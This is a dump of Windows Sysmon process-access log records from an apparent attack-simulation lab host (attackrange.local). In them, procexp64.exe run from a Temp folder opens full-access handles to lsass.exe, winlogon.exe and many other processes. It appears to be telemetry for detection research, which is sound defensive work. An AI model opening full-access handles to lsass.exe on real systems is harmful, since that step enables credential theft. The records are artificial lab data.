15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787145Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787144Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787143Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787142Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787141Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787140Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787139Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787138Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787137Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787260Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787259Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787258Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787257Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787256Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787255Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787254Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787253Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787252Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787251Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787250Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787249Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787248Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787247Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787246Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787245Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787244Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787243Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787242Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787241Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787240Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787239Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787238Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787237Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787236Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787235Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787234Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787233Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 